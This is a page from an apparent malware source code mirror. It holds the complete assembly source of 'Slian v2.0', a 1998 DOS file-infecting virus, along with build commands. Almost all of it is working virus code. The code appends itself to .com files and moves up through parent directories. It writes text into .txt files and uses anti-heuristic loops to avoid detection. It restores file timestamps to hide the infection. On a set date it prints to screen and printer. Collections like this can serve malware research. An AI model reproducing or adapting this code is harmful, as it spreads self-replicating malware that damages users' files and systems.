mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
278 lines
12 KiB
NASM
278 lines
12 KiB
NASM
; ------------------------------------------------------------------------- ;
|
|
; Slian v2.0 coded by KilJaeden of the Codebreakers 1998 ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; Description: ;
|
|
; ;
|
|
; v1.0 - start with *.com appender - great tutorials Horny Toad! CB #1,2,3 ;
|
|
; v1.1 - add a anti-heuristic loop - Ars0nic's article in Codebreakers #3 ;
|
|
; v1.2 - add no bigger, no smaller - Opic's Virus-Addons article in CB #3 ;
|
|
; v1.3 - add directory transversal - thankz to SPo0ky / Opic for this :) ;
|
|
; v1.4 - add date activated p-load - Opic's Virus-Addons article in CB #3 ;
|
|
; v1.5 - add *.txt file overwriter - great tutorials Horny Toad! CB #1,2,3 ;
|
|
; v1.6 - optimize my code a little - thanks Opic :) ;
|
|
; v1.7 - add anti-heuristic tricks - Ars0nic's article in Codebreakers #3 ;
|
|
; v1.8 - add appending of any file - Sea4's Nautilus Virus ;
|
|
; v1.9 - add overwrite of any file - thanks again Sea4 hehe ;
|
|
; v2.0 - add date/time restoration - thankz again Opic man :) ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; -----------> Dedicated to Christine Moore, I'll be back soon! <---------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; to compile ::] tasm slian.asm ;
|
|
; to link :::::] tlink /t slian.obj ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
code segment ; name our segment "code"
|
|
assume cs:code,ds:code ; assign cs and ds to code
|
|
org 100h ; a .com file
|
|
|
|
start:
|
|
db 0e9h,0,0 ; define a blank jump
|
|
|
|
real_start:
|
|
mov cx,0ffffh ; from other anti-heuristics
|
|
|
|
anti_one:
|
|
jmp anti_two ; jump to anti two
|
|
mov ax,4c00h ; terminate program
|
|
call do_it ; make it so DOS!
|
|
|
|
anti_two:
|
|
loop anti_one ; loop anti_one
|
|
|
|
;call_delta:
|
|
call get_delta ; push IP on to stack
|
|
|
|
get_delta:
|
|
pop bp ; pop it into bp
|
|
sub bp,offset get_delta ; get the delta offset
|
|
|
|
;first_three:
|
|
mov cx,3 ; counter set to three
|
|
lea si,[bp+offset thrbyte] ; where to write them
|
|
mov di,100h ; start address
|
|
push di ; save it for retn
|
|
rep movsb ; do until cx = 0
|
|
|
|
;move_dta:
|
|
lea dx,[bp+offset dta] ; where to move it
|
|
mov ah,1ah ; move the dta
|
|
call do_it ; make it so DOS!
|
|
|
|
get_one:
|
|
mov ah,4eh ; find first file
|
|
lea dx,[bp+comfile] ; load *.com
|
|
mov cx,7 ; all attributes
|
|
|
|
next:
|
|
call do_it ; make it so DOS!
|
|
jnc open_file ; found one? open it
|
|
jmp find_txt ; no .com left? .txt now
|
|
|
|
next_dir:
|
|
lea dx,[bp+dot_dot] ; load effective address ..
|
|
mov ah,3bh ; directory changing
|
|
call do_it ; make it so DOS!
|
|
jnc get_one ; and find first again
|
|
jmp pld_chk ; hit root, payload time?
|
|
|
|
open_file:
|
|
lea dx,[bp+dta+1eh] ; filename in DTA
|
|
mov ax,4301h ; set file attributes
|
|
xor cx,cx ; to absolutely none
|
|
call do_it ; make it so DOS!
|
|
|
|
mov ax,3d02h ; open the file read/write
|
|
lea dx,[bp+offset dta+1eh] ; get the file name info
|
|
call do_it ; make it so DOS!
|
|
xchg ax,bx ; move the file info
|
|
|
|
mov ax,5700h ; get time/date stamps
|
|
call do_it ; make it so DOS!
|
|
mov [bp+time_cm],dx ; save the values here
|
|
mov [bp+date_cm],cx ; save the values here
|
|
|
|
;record_three:
|
|
mov ah,3fh ; the read / record function
|
|
lea dx,[bp+thrbyte] ; where to record too
|
|
mov cx,3 ; how much to record
|
|
call do_it ; make it so DOS!
|
|
|
|
;file_check:
|
|
mov ax,word ptr [bp+dta+1ah] ; get file size
|
|
mov cx,word ptr [bp+thrbyte+1] ; get three bytes
|
|
add cx,finished-real_start+3 ; get virus and jump size
|
|
cmp ax,cx ; compare the two
|
|
jz close_file ; if equal, close file
|
|
|
|
;too_big:
|
|
cmp word ptr [bp+dta+1ah],61440 ; > then 61440d bytes?
|
|
jna too_small ; not too big, too small?
|
|
jmp close_file ; too big, close it up
|
|
|
|
too_small:
|
|
cmp word ptr [bp+dta+1ah],1024 ; < then 1024d bytes?
|
|
jnb new_jump ; not too small, continue
|
|
jmp close_file ; too small, close it up
|
|
|
|
new_jump:
|
|
sub ax,3 ; file size - 3 bytes
|
|
mov word ptr [bp+newjump+1],ax ; write as new jump
|
|
|
|
;point_to_begin:
|
|
mov ax,4200h ; point to start of file
|
|
xor cx,cx ; cx to 0
|
|
xor dx,dx ; dx to 0
|
|
call do_it ; make it so DOS!
|
|
|
|
;write_jump:
|
|
mov ah,40h ; write to file
|
|
mov cx,3 ; three bytes
|
|
lea dx,[bp+newjump] ; write this
|
|
call do_it ; make it so DOS!
|
|
|
|
;point_to_end:
|
|
mov ax,4202h ; point to end of file
|
|
xor cx,cx ; cx to 0
|
|
xor dx,dx ; dx to 0
|
|
call do_it ; make it so DOS!
|
|
|
|
;write_body:
|
|
mov ah,40h ; write to file
|
|
lea dx,[bp+real_start] ; what to write
|
|
mov cx,finished-real_start ; how much to write
|
|
call do_it ; make it so DOS!
|
|
|
|
close_file:
|
|
mov ax,5701h ; restore time/date stamps
|
|
mov dx,[bp+time_cm] ; from this value
|
|
mov cx,[bp+date_cm] ; and this value
|
|
call do_it ; make it so DOS!
|
|
|
|
mov ah,3eh ; close up the file
|
|
call do_it ; make it so DOS!
|
|
|
|
;next_file:
|
|
mov ah,4fh ; find next file
|
|
jmp next ; and jump to next
|
|
|
|
find_txt:
|
|
mov dx,80h ; move DTA to here
|
|
mov ah,1ah ; move the DTA
|
|
call do_it ; make it so DOS!
|
|
mov ah,4eh ; find first file
|
|
xor cx,cx ; cx to 0
|
|
lea dx,txtfile ; load *.txt address
|
|
|
|
next_txt:
|
|
call do_it ; make it so DOS!
|
|
jnc open_txt ; found a .txt? open it
|
|
jmp next_dir ; none found? next directory
|
|
|
|
open_txt:
|
|
mov dx,9eh ; filename in DTA
|
|
mov ax,4301h ; set file attributes
|
|
xor cx,cx ; to absolutely none
|
|
call do_it ; make it so DOS!
|
|
|
|
mov ax,3d02h ; all file attributes
|
|
mov dx,9eh ; get the file name info
|
|
call do_it ; make it so DOS!
|
|
xchg bx,ax ; move the file info
|
|
|
|
mov ax,5700h ; get time/date stamps
|
|
call do_it ; make it so DOS!
|
|
mov [bp+time_tx],dx ; save the values here
|
|
mov [bp+date_tx],cx ; save the values here
|
|
|
|
;infect_txt:
|
|
mov ah,40h ; write to file
|
|
lea dx,txt_start ; where to start
|
|
mov cx,txt_end-txt_start ; how much to write
|
|
call do_it ; make it so DOS!
|
|
|
|
;close_txt:
|
|
mov ax,5701h ; restore time/date stamps
|
|
mov dx,[bp+time_tx] ; from this value
|
|
mov cx,[bp+date_tx] ; and this value
|
|
call do_it ; make it so DOS!
|
|
|
|
mov ah,3eh ; close the file
|
|
call do_it ; make it so DOS!
|
|
|
|
;find_next:
|
|
mov ah,4fh ; find next .txt file
|
|
jmp next_txt ; and go again
|
|
|
|
end_virus:
|
|
retn ; return control to host
|
|
|
|
pld_chk:
|
|
mov ah,2ah ; get system date
|
|
call do_it ; make it so DOS!
|
|
cmp dh,07 ; is it July?
|
|
je day_chk ; yes it is, check day now
|
|
jmp end_virus ; nope, end virus
|
|
|
|
day_chk:
|
|
cmp dl,16 ; is it the 16th?
|
|
je payload ; woohoo payload time!
|
|
jmp end_virus ; nope, end virus
|
|
|
|
payload:
|
|
mov ah,09h ; print a message to screen
|
|
lea dx,[bp+pld_msg] ; the message
|
|
call do_it ; make it so DOS!
|
|
mov ah,01h ; start printer <grin>
|
|
mov dx,0h ; put 0h into dx
|
|
int 17h ; printer int
|
|
lea si,string1 ; where to start
|
|
mov cx,endstring1-string1 ; how much to write
|
|
|
|
print_message:
|
|
mov ah,00h ; write characters
|
|
lodsb ; load a byte
|
|
int 17h ; printer int
|
|
loop print_message ; loop until done
|
|
jmp end_virus ; and end the virus
|
|
|
|
do_it:
|
|
int 21h ; make it so DOS!
|
|
ret ; return from call
|
|
|
|
;data_area:
|
|
txt_start:
|
|
db '',10
|
|
db 'Need you, Dream you',10
|
|
db 'Find you, Taste you',10
|
|
db 'Fuck you, Use you',10
|
|
db 'Scar you, Break you',10
|
|
db 'Lose me, Hate me',10
|
|
db 'Smash me, Erase me',10
|
|
db '',10
|
|
txt_end:
|
|
|
|
string1:
|
|
pld_msg db '',10,13
|
|
db 'Happy Birthday Christine!',10,13
|
|
db 'Your As Beautiful As Ever',10,13,'$'
|
|
endstring1:
|
|
|
|
time_cm dw 0h ; .com time stamp goes here
|
|
time_tx dw 0h ; .txt time stamp goes here
|
|
date_cm dw 0h ; .com date stamp goes here
|
|
date_tx dw 0h ; .txt date stamp goes here
|
|
dot_dot db "..",0 ; define the .. string
|
|
comfile db "*.c*",0 ; define the *.com string
|
|
txtfile db "*.tx*",0 ; define the *.txt string
|
|
thrbyte db 0cdh,20h,0 ; terminates on first run
|
|
newjump db 0e9h,0,0 ; blank jump on first run
|
|
finished label near ; an offset label
|
|
dta db 42 dup (?) ; set up space for DTA
|
|
code ends ; end code segment
|
|
end start ; end / where to start
|
|
|
|
; ------------------------------------------------------------------------- ;
|
|
; ----------> How Can You Think Freely In The Shadow Of A Church <--------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|